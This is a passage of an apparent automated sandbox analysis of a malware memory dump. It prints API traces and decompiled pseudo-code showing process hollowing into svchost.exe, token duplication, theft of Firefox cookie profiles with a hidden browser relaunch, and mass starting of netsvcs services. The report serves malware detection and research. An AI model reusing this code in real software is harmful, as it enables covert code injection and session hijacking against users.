                                                                                    0x04ec9fc5
                                                                                    0x00000000
                                                                                    0x04ec9f11
                                                                                    0x04ec9f16
                                                                                    0x04ec9f1f
                                                                                    0x04ec9f26
                                                                                    0x04ec9f2b
                                                                                    0x04ec9f2d
                                                                                    0x04ec9f2f
                                                                                    0x00000000
                                                                                    0x04ec9f35
                                                                                    0x04ec9f35
                                                                                    0x04ec9f38
                                                                                    0x04ec9f3a
                                                                                    0x00000000
                                                                                    0x04ec9f40
                                                                                    0x04ec9f49
                                                                                    0x04ec9f4b
                                                                                    0x04ec9f50
                                                                                    0x04ec9f53
                                                                                    0x04ec9f55
                                                                                    0x00000000
                                                                                    0x04ec9f5b
                                                                                    0x04ec9f63
                                                                                    0x04ec9f68
                                                                                    0x00000000
                                                                                    0x04ec9f6e
                                                                                    0x04ec9f75
                                                                                    0x04ec9f81
                                                                                    0x04ec9f90
                                                                                    0x04ec9f97
                                                                                    0x04ec9f99
                                                                                    0x04ec9f99
                                                                                    0x04ec9f9d
                                                                                    0x04ec9f9d
                                                                                    0x04ec9f68
                                                                                    0x04ec9f55
                                                                                    0x04ec9f3a
                                                                                    0x04ec9f2f
                                                                                    0x04ec9f0b
                                                                                    0x00000000
                                                                                    0x04ec9f00
                                                                                    0x04ec9ea0
                                                                                    0x04ec9e72
                                                                                    0x04ec9e4c
                                                                                    0x04ec9e4c
                                                                                    0x04ec9e53
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e53
                                                                                    0x04ec9e4a
                                                                                    0x04ec9e36
                                                                                    0x00000000
                                                                                    0x04ec9e22
                                                                                    0x04ec9e76
                                                                                    0x00000000
                                                                                    0x04ec9e76
                                                                                    0x04ec9e10
                                                                                    0x04ec9dfe
                                                                                    0x04ec9e7d
                                                                                    0x04ec9e7d
                                                                                    0x04ec9e80
                                                                                    0x04ec9e82
                                                                                    0x04ec9e85
                                                                                    0x04ec9e85
                                                                                    0x04ec9e8f
                                                                                    0x04ec9a9a
                                                                                    0x04ec9a9c
                                                                                    0x00000000
                                                                                    0x04ec9a9c
                                                                                    0x04ec9a94

                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(00000114), ref: 04EC9968
                                                                                      • Part of subcall function 04EC5C60: GetCurrentProcessId.KERNEL32(?,74E04DC0), ref: 04EC5C75
                                                                                      • Part of subcall function 04EC5C60: CreateToolhelp32Snapshot.KERNEL32 ref: 04EC5C8B
                                                                                      • Part of subcall function 04EC5C60: Process32FirstW.KERNEL32(00000000,0000022C), ref: 04EC5CA5
                                                                                      • Part of subcall function 04EC5C60: Process32NextW.KERNEL32(00000000,0000022C), ref: 04EC5CC6
                                                                                      • Part of subcall function 04EC5C60: FindCloseChangeNotification.KERNEL32(00000000), ref: 04EC5CDC
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 04EC99A9
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList), ref: 04EC99C5
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC99CC
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,UpdateProcThreadAttribute), ref: 04EC99DA
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC99E1
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC9A6A
                                                                                    • wsprintfW.USER32 ref: 04EC9AB9
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSEnumerateSessionsW,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9ADC
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC9AE3
                                                                                      • Part of subcall function 04EC5D00: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D18
                                                                                      • Part of subcall function 04EC5D00: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D25
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSFreeMemory,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9B61
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC9B68
                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9B7D
                                                                                    • GetCurrentProcess.KERNEL32 ref: 04EC9BB2
                                                                                    • OpenProcessToken.ADVAPI32(00000000,0000000B,00000000), ref: 04EC9BC0
                                                                                    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000), ref: 04EC9BDE
                                                                                    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 04EC9BFE
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9C12
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9C28
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9C3E
                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 04EC9C6B
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9C74
                                                                                    • CreateProcessW.KERNEL32 ref: 04EC9CA0
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9CBA
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC9CC1
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 04EC9CE2
                                                                                    • GetThreadContext.KERNEL32(?,?), ref: 04EC9D03
                                                                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 04EC9D1F
                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 04EC9D31
                                                                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 04EC9D5C
                                                                                    • SetThreadContext.KERNEL32(?,00010007), ref: 04EC9D79
                                                                                    • ResumeThread.KERNEL32(?), ref: 04EC9D87
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC9D96
                                                                                    • OpenThread.KERNEL32(001FFFFF,00000000,00000000,Dispatch,00000000,00000001,74E5F750), ref: 04EC9E2C
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC9E3B
                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 04EC9E42
                                                                                    • CloseHandle.KERNEL32(00000000,Dispatch), ref: 04EC9E85
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000BB8,00000001,74E5F750), ref: 04EC9EED
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9EF7
                                                                                      • Part of subcall function 04ECA860: SetConsoleCtrlHandler.KERNEL32(04ECA880,00000000,00000001,04EC9E7B,Dispatch,00000000,00000001,74E5F750), ref: 04ECA86E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Close$Handle$AddressLibraryLoadProcThread$Open$CreateCurrentToken$ContextObjectProcess32SingleWait$AllocChangeCodeConsoleCtrlDirectoryDuplicateExitFindFirstHandlerInformationMemoryNextNotificationResumeSleepSnapshotSystemTerminateToolhelp32UserVersionVirtualWritewsprintf
                                                                                    • String ID: %ssvchost.exe -k SystemNetworkService$Control$DeleteProcThreadAttributeList$Dispatch$H$InitializeProcThreadAttributeList$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$\$kernel32.dll
                                                                                    • API String ID: 2302521369-2611280217
                                                                                    • Opcode ID: 9c78712a980e65aa64574015d935efededb2323b4c93034a028fa36a2fa410ff
                                                                                    • Instruction ID: 98fc06f56861d5c6b194b477152e4190cf8a15d9f1af4e11d403a22bac71f0f0
                                                                                    • Opcode Fuzzy Hash: 9c78712a980e65aa64574015d935efededb2323b4c93034a028fa36a2fa410ff
                                                                                    • Instruction Fuzzy Hash: 25F1DFB1604300EBE720DB65CD05FABBBE9EF84B09F14191DF945A6190EB74E906CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6A30, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 131stringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E04EB6A30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				short _v536;
				short _v1056;
				short _v1576;
				short _v2096;
				struct _WIN32_FIND_DATAW _v2688;
				char _v2692;
				intOrPtr _v2696;
				char _v2712;
				signed int _t34;
				int _t60;
				intOrPtr _t76;
				void* _t77;
				void* _t89;
				void* _t91;
				signed int _t92;
				void* _t93;
				void* _t94;

				_t34 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t34 ^ _t92;
				_t76 = __ecx;
				_v2692 = 0x104;
				_v2696 = __ecx;
				_t79 =  &_v536;
				if(E04EC7200( &_v536,  &_v2692, __eflags) == 0) {
					__eflags = _v12 ^ _t92;
					return E04ED572E(_v12 ^ _t92);
				} else {
					lstrcatW( &_v536, L"\\AppData\\Roaming\\Mozilla\\Firefox");
					_t77 = wsprintfW;
					wsprintfW( &_v1576, L"%s\\%s",  &_v536,  *((intOrPtr*)(_t76 + 0x70)));
					wsprintfW( &_v2096, L"%s%s",  &_v536, L"\\Profiles\\*.*");
					_t94 = _t93 + 0x20;
					_t89 = FindFirstFileW( &_v2096,  &_v2688);
					if(_t89 != 0xffffffff) {
						_t91 = lstrcmpW;
						do {
							if(lstrcmpW( &(_v2688.cFileName), ".") == 0 || lstrcmpW( &(_v2688.cFileName), L"..") == 0) {
								goto L6;
							} else {
								wsprintfW( &_v1056, L"%s\\Profiles\\%s\\cookies.sqlite",  &_v536,  &(_v2688.cFileName));
								_t94 = _t94 + 0x10;
								if(PathFileExistsW( &_v1056) != 0) {
									wsprintfW( &_v1056, L"%s\\Profiles\\%s",  &_v536,  &(_v2688.cFileName));
									_t94 = _t94 + 0x10;
									_t79 =  &_v1056;
									E04EC7390(_t77,  &_v1056,  &_v1576, _t89, _t91);
								} else {
									goto L6;
								}
							}
							L9:
							FindClose(_t89);
							goto L10;
							L6:
							_t60 = FindNextFileW(_t89,  &_v2688);
							_t104 = _t60;
						} while (_t60 != 0);
						goto L9;
					}
					L10:
					wsprintfW( &_v536, L"cmd.exe /c start firefox.exe -no-remote -profile \"%s\"",  &_v1576);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0xa94], xmm0");
					_push( &_v2712);
					_push( &_v536);
					E04EC72A0(_t77,  *((intOrPtr*)(_v2696 + 0x70)), _t104);
					return E04ED572E(_v12 ^ _t92, _t79);
				}
			}





















                                                                                    0x04eb6a39
                                                                                    0x04eb6a40
                                                                                    0x04eb6a44
                                                                                    0x04eb6a46
                                                                                    0x04eb6a58
                                                                                    0x04eb6a5e
                                                                                    0x04eb6a6b
                                                                                    0x04eb6be1
                                                                                    0x04eb6bec
                                                                                    0x04eb6a71
                                                                                    0x04eb6a7d
                                                                                    0x04eb6a86
                                                                                    0x04eb6a9f
                                                                                    0x04eb6ab9
                                                                                    0x04eb6abb
                                                                                    0x04eb6ad2
                                                                                    0x04eb6ad7
                                                                                    0x04eb6add
                                                                                    0x04eb6ae3
                                                                                    0x04eb6af3
                                                                                    0x00000000
                                                                                    0x04eb6b07
                                                                                    0x04eb6b21
                                                                                    0x04eb6b23
                                                                                    0x04eb6b35
                                                                                    0x04eb6b65
                                                                                    0x04eb6b67
                                                                                    0x04eb6b70
                                                                                    0x04eb6b76
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb6b35
                                                                                    0x04eb6b7b
                                                                                    0x04eb6b7c
                                                                                    0x00000000
                                                                                    0x04eb6b37
                                                                                    0x04eb6b3f
                                                                                    0x04eb6b45
                                                                                    0x04eb6b45
                                                                                    0x00000000
                                                                                    0x04eb6b49
                                                                                    0x04eb6b82
                                                                                    0x04eb6b95
                                                                                    0x04eb6ba6
                                                                                    0x04eb6ba9
                                                                                    0x04eb6bb3
                                                                                    0x04eb6bbd
                                                                                    0x04eb6bbf
                                                                                    0x04eb6bd7
                                                                                    0x04eb6bd7

                                                                                    APIs
                                                                                      • Part of subcall function 04EC7200: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                      • Part of subcall function 04EC7200: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                      • Part of subcall function 04EC7200: GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                      • Part of subcall function 04EC7200: CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    • lstrcatW.KERNEL32(?,\AppData\Roaming\Mozilla\Firefox), ref: 04EB6A7D
                                                                                    • wsprintfW.USER32 ref: 04EB6A9F
                                                                                    • wsprintfW.USER32 ref: 04EB6AB9
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EB6ACC
                                                                                    • lstrcmpW.KERNEL32(?,04EFC940), ref: 04EB6AEF
                                                                                    • lstrcmpW.KERNEL32(?,04EFC944), ref: 04EB6B01
                                                                                    • wsprintfW.USER32 ref: 04EB6B21
                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 04EB6B2D
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 04EB6B3F
                                                                                    • wsprintfW.USER32 ref: 04EB6B65
                                                                                    • FindClose.KERNEL32(00000000), ref: 04EB6B7C
                                                                                    • wsprintfW.USER32 ref: 04EB6B95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$FileFind$Closelstrcmp$AddressDirectoryExistsFirstHandleLibraryLoadNextPathProcProfileUserlstrcat
                                                                                    • String ID: %s%s$%s\%s$%s\Profiles\%s$%s\Profiles\%s\cookies.sqlite$\AppData\Roaming\Mozilla\Firefox$\Profiles\*.*$cmd.exe /c start firefox.exe -no-remote -profile "%s"
                                                                                    • API String ID: 1955834022-409733341
                                                                                    • Opcode ID: ea1e8899554aded477d5172500a7a83c978760a3735e4a014373516bdcb6c050
                                                                                    • Instruction ID: 67efeccbd7dd1c751a266cf120fea73260d4b2a5973f65393a37ee721d2b1a73
                                                                                    • Opcode Fuzzy Hash: ea1e8899554aded477d5172500a7a83c978760a3735e4a014373516bdcb6c050
                                                                                    • Instruction Fuzzy Hash: 27415772A4021D97DB20DBB4DD84DEEB3BCFB48314F5055E6E909D2000EA35FA898F61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECB800, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 159serviceCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 63%
                                                                                    			E04ECB800() {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				int _v28;
				short** _v32;
				int _v36;
				void* _t34;
				int _t39;
				long _t40;
				void* _t41;
				int _t50;
				WCHAR* _t54;
				void* _t66;
				short** _t73;
				void* _t75;
				void* _t76;
				intOrPtr* _t77;
				void* _t80;

				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t34 = OpenSCManagerW(0, 0, 0xf003f);
				_t75 = _t34;
				if(_t75 != 0) {
					_t77 = __imp__EnumServicesStatusExW;
					 *_t77(_t75, 0, 0x30, 2, 0, 0,  &_v16,  &_v8,  &_v12, 0, _t76);
					_t39 = _v16;
					if(_t39 != 0) {
						_t40 = _t39 + 0x2c;
						_v32 = _t40;
						_t41 = LocalAlloc(0x40, _t40);
						_v20 = _t41;
						if(_t41 != 0) {
							_push(0);
							_v12 = 0;
							_push( &_v12);
							_push( &_v8);
							_push( &_v16);
							_push(_v32);
							_push(_t41);
							_push(2);
							_push(0x30);
							_push(0);
							_push(_t75);
							if( *_t77() != 0) {
								_t66 = LocalAlloc(0x40, 0x2000);
								_v36 = 0;
								_v28 = 0;
								if(_v8 > 0) {
									_t73 = _v20;
									_v32 = _t73;
									do {
										_t80 = OpenServiceW(_t75,  *_t73, 0x15);
										if(_t80 != 0) {
											if(QueryServiceConfigW(_t80, _t66, 0x2000,  &_v36) != 0 &&  *((intOrPtr*)(_t66 + 4)) == 2) {
												_t54 =  *(_t66 + 0xc);
												if(_t54 != 0 && StrStrIW(_t54, L"-k netsvcs") != 0 && StartServiceW(_t80, 0, 0) != 0) {
													_v24 = _v24 + 1;
												}
											}
											CloseServiceHandle(_t80);
										}
										_t50 = _v28 + 1;
										_t73 =  &(_v32[0xb]);
										_v28 = _t50;
										_v32 = _t73;
									} while (_t50 < _v8);
								}
								LocalFree(_t66);
								LocalFree(_v20);
								CloseServiceHandle(_t75);
								return _v24;
							} else {
								CloseServiceHandle(_t75);
								LocalFree(_v20);
								return 0;
							}
						} else {
							CloseServiceHandle(_t75);
							return 0;
						}
					} else {
						CloseServiceHandle(_t75);
						return 0;
					}
				} else {
					return _t34;
				}
			}























                                                                                    0x04ecb810
                                                                                    0x04ecb817
                                                                                    0x04ecb81e
                                                                                    0x04ecb825
                                                                                    0x04ecb82c
                                                                                    0x04ecb832
                                                                                    0x04ecb836
                                                                                    0x04ecb83e
                                                                                    0x04ecb85d
                                                                                    0x04ecb85f
                                                                                    0x04ecb864
                                                                                    0x04ecb87c
                                                                                    0x04ecb882
                                                                                    0x04ecb885
                                                                                    0x04ecb887
                                                                                    0x04ecb88c
                                                                                    0x04ecb89e
                                                                                    0x04ecb8a3
                                                                                    0x04ecb8aa
                                                                                    0x04ecb8ae
                                                                                    0x04ecb8b2
                                                                                    0x04ecb8b3
                                                                                    0x04ecb8b6
                                                                                    0x04ecb8b7
                                                                                    0x04ecb8b9
                                                                                    0x04ecb8bb
                                                                                    0x04ecb8bd
                                                                                    0x04ecb8c2
                                                                                    0x04ecb8ea
                                                                                    0x04ecb8ec
                                                                                    0x04ecb8f3
                                                                                    0x04ecb8fa
                                                                                    0x04ecb8fc
                                                                                    0x04ecb8ff
                                                                                    0x04ecb902
                                                                                    0x04ecb90d
                                                                                    0x04ecb911
                                                                                    0x04ecb926
                                                                                    0x04ecb92e
                                                                                    0x04ecb933
                                                                                    0x04ecb954
                                                                                    0x04ecb954
                                                                                    0x04ecb933
                                                                                    0x04ecb958
                                                                                    0x04ecb958
                                                                                    0x04ecb964
                                                                                    0x04ecb965
                                                                                    0x04ecb968
                                                                                    0x04ecb96b
                                                                                    0x04ecb96e
                                                                                    0x04ecb902
                                                                                    0x04ecb97a
                                                                                    0x04ecb97f
                                                                                    0x04ecb982
                                                                                    0x04ecb991
                                                                                    0x04ecb8c4
                                                                                    0x04ecb8c5
                                                                                    0x04ecb8ce
                                                                                    0x04ecb8dc
                                                                                    0x04ecb8dc
                                                                                    0x04ecb88e
                                                                                    0x04ecb88f
                                                                                    0x04ecb89d
                                                                                    0x04ecb89d
                                                                                    0x04ecb866
                                                                                    0x04ecb867
                                                                                    0x04ecb874
                                                                                    0x04ecb874
                                                                                    0x04ecb83c
                                                                                    0x04ecb83c
                                                                                    0x04ecb83c

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000), ref: 04ECB82C
                                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04ECB85D
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04ECB867
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                                                                    • String ID: -k netsvcs
                                                                                    • API String ID: 236840872-1604415765
                                                                                    • Opcode ID: 47a4e10d09a500b06ff16264dba61aed561b0819d4f137ba495b0f4b57e89a99
                                                                                    • Instruction ID: be1a2efdf0328346ba8356de5e7e3814aa149c9ee94e7d93be8703b99a763851
                                                                                    • Opcode Fuzzy Hash: 47a4e10d09a500b06ff16264dba61aed561b0819d4f137ba495b0f4b57e89a99
                                                                                    • Instruction Fuzzy Hash: 7451A371A41209AFEB10CFA5ED46FBFBBB8EB44705F10415AFA04E6180D778A905CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC7390, Relevance: 25.6, APIs: 17, Instructions: 133stringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 94%
                                                                                    			E04EC7390(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v532;
				short _v1052;
				short _v1572;
				struct _WIN32_FIND_DATAW _v2164;
				WCHAR* _v2168;
				WCHAR* _v2172;
				void* _v2176;
				signed int _t35;
				int _t43;
				void* _t46;
				WCHAR* _t81;
				void* _t82;
				void* _t90;
				WCHAR* _t92;
				void* _t93;
				signed int _t94;
				void* _t95;
				void* _t96;

				_t35 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t35 ^ _t94;
				_t92 = __edx;
				_t81 = __ecx;
				_v2172 = __edx;
				_v2168 = __ecx;
				E04EDDAD0(__edi,  &_v1572, 0, 0x208);
				_t96 = _t95 + 0xc;
				lstrcpyW( &_v1572, _t81);
				_t90 = lstrcatW;
				lstrcatW( &_v1572, L"\\*");
				_t43 = CreateDirectoryW(_t92, 0);
				_t82 = GetLastError;
				if(_t43 != 0 || GetLastError() == 0xb7) {
					_t46 = FindFirstFileW( &_v1572,  &_v2164);
					_v2176 = _t46;
					if(_t46 == 0xffffffff) {
						goto L12;
					}
					_t93 = lstrcmpW;
					asm("o16 nop [eax+eax]");
					do {
						E04EDDAD0(_t90,  &_v1052, 0, 0x208);
						lstrcpyW( &_v1052, _v2168);
						lstrcatW( &_v1052, 0x4efc92c);
						lstrcatW( &_v1052,  &(_v2164.cFileName));
						E04EDDAD0(_t90,  &_v532, 0, 0x208);
						_t96 = _t96 + 0x18;
						lstrcpyW( &_v532, _v2172);
						lstrcatW( &_v532, 0x4efc92c);
						lstrcatW( &_v532,  &(_v2164.cFileName));
						if((_v2164.dwFileAttributes & 0x00000010) == 0 || lstrcmpW( &(_v2164.cFileName), ".") == 0 || lstrcmpW( &(_v2164.cFileName), L"..") == 0) {
							CopyFileW( &_v1052,  &_v532, 0);
						} else {
							if(CreateDirectoryW( &_v532, 0) != 0 || GetLastError() == 0xb7) {
								E04EC7390(_t82,  &_v1052,  &_v532, _t90, _t93);
							}
						}
					} while (FindNextFileW(_v2176,  &_v2164) != 0);
					goto L12;
				} else {
					L12:
					return E04ED572E(_v8 ^ _t94);
				}
			}






















                                                                                    0x04ec7399
                                                                                    0x04ec73a0
                                                                                    0x04ec73b1
                                                                                    0x04ec73b3
                                                                                    0x04ec73b5
                                                                                    0x04ec73be
                                                                                    0x04ec73c4
                                                                                    0x04ec73c9
                                                                                    0x04ec73d4
                                                                                    0x04ec73da
                                                                                    0x04ec73ec
                                                                                    0x04ec73f1
                                                                                    0x04ec73f7
                                                                                    0x04ec73ff
                                                                                    0x04ec741c
                                                                                    0x04ec7422
                                                                                    0x04ec742b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec7431
                                                                                    0x04ec7437
                                                                                    0x04ec7440
                                                                                    0x04ec744e
                                                                                    0x04ec7463
                                                                                    0x04ec7475
                                                                                    0x04ec7485
                                                                                    0x04ec7495
                                                                                    0x04ec749a
                                                                                    0x04ec74aa
                                                                                    0x04ec74bc
                                                                                    0x04ec74cc
                                                                                    0x04ec74d5
                                                                                    0x04ec753a
                                                                                    0x04ec74fb
                                                                                    0x04ec750c
                                                                                    0x04ec7523
                                                                                    0x04ec7523
                                                                                    0x04ec750c
                                                                                    0x04ec7553
                                                                                    0x00000000
                                                                                    0x04ec755b
                                                                                    0x04ec755b
                                                                                    0x04ec756b
                                                                                    0x04ec756b

                                                                                    APIs
                                                                                    • lstrcpyW.KERNEL32 ref: 04EC73D4
                                                                                    • lstrcatW.KERNEL32(?,04EFE170), ref: 04EC73EC
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC73F1
                                                                                    • GetLastError.KERNEL32 ref: 04EC7401
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 04EC741C
                                                                                    • lstrcpyW.KERNEL32 ref: 04EC7463
                                                                                    • lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC7475
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 04EC7485
                                                                                    • lstrcpyW.KERNEL32 ref: 04EC74AA
                                                                                    • lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC74BC
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 04EC74CC
                                                                                    • lstrcmpW.KERNEL32(?,04EFC940), ref: 04EC74E3
                                                                                    • lstrcmpW.KERNEL32(?,04EFC944), ref: 04EC74F5
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC7504
                                                                                    • GetLastError.KERNEL32 ref: 04EC750E
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 04EC753A
                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 04EC754D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2173410017-0
                                                                                    • Opcode ID: e640083ee271ae93745271452a8e6e7ec8f3debc2f1ad8c8b22570c699181427
                                                                                    • Instruction ID: 1c436ad4b9dc2398a713c811e1b5b9ae3d9ee77a1ae79f58fe43112b6f0b9944
                                                                                    • Opcode Fuzzy Hash: e640083ee271ae93745271452a8e6e7ec8f3debc2f1ad8c8b22570c699181427
                                                                                    • Instruction Fuzzy Hash: AF416271D0021DAADB20DBB1DC88FE977BCFB48705F1455E9AA19E3044EB74EA858F90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB42B0, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228memoryfilestringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 75%
                                                                                    			E04EB42B0(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				short _v1056;
				char _v2096;
				short _v3136;
				intOrPtr _v3704;
				struct _WIN32_FIND_DATAW _v3728;
				signed int _v3732;
				long _v3736;
				intOrPtr _v3740;
				signed int _v3744;
				void* _v3748;
				signed int _t80;
				void* _t88;
				signed int _t91;
				signed int _t92;
				signed int _t99;
				signed int _t100;
				void* _t101;
				signed int _t104;
				signed int _t128;
				void* _t133;
				signed int _t137;
				signed int _t139;
				void* _t140;
				void* _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				long _t152;
				void* _t153;
				long _t154;
				signed int _t155;
				void* _t156;
				void* _t157;

				_t80 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t80 ^ _t155;
				_t147 = _a4;
				_t152 = 0x2800;
				_v3744 = __ecx;
				_v3740 = _t147;
				_v3732 = _a8;
				_v3736 = 0x2800;
				_t133 = LocalAlloc(0x40, 0x2800);
				wsprintfW( &_v3136, L"%s\\*.*", _t147);
				_t157 = _t156 + 0xc;
				_t88 = FindFirstFileW( &_v3136,  &_v3728);
				_v3748 = _t88;
				if(_t88 != 0xffffffff) {
					 *_t133 = 0x74;
					_t148 = 1;
					asm("o16 nop [eax+eax]");
					do {
						_t137 = ".";
						_t91 =  &(_v3728.cFileName);
						while(1) {
							_t140 =  *_t91;
							if(_t140 !=  *_t137) {
								break;
							}
							if(_t140 == 0) {
								L7:
								_t92 = 0;
							} else {
								_t145 =  *((intOrPtr*)(_t91 + 2));
								_t14 = _t137 + 2; // 0x2e0000
								if(_t145 !=  *_t14) {
									break;
								} else {
									_t91 = _t91 + 4;
									_t137 = _t137 + 4;
									if(_t145 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t92 != 0) {
								_t137 = L"..";
								_t99 =  &(_v3728.cFileName);
								while(1) {
									_t141 =  *_t99;
									if(_t141 !=  *_t137) {
										break;
									}
									if(_t141 == 0) {
										L15:
										_t100 = 0;
									} else {
										_t144 =  *((intOrPtr*)(_t99 + 2));
										_t17 = _t137 + 2; // 0x2e
										if(_t144 !=  *_t17) {
											break;
										} else {
											_t99 = _t99 + 4;
											_t137 = _t137 + 4;
											if(_t144 != 0) {
												continue;
											} else {
												goto L15;
											}
										}
									}
									L17:
									if(_t100 != 0) {
										_t101 = 0;
										do {
											_t137 =  *(_t155 + _t101 - 0xe60) & 0x0000ffff;
											_t101 = _t101 + 2;
											 *(_t155 + _t101 - 0x82e) = _t137;
										} while (_t137 != 0);
										if(_a12 != 0) {
											E04EDEDE0( &_v2096);
											_t157 = _t157 + 4;
										}
										if(_a16 != 0 || (_v3728.dwFileAttributes & 0x00000010) == 0) {
											_t102 =  &_v2096;
											if(_a20 == 0) {
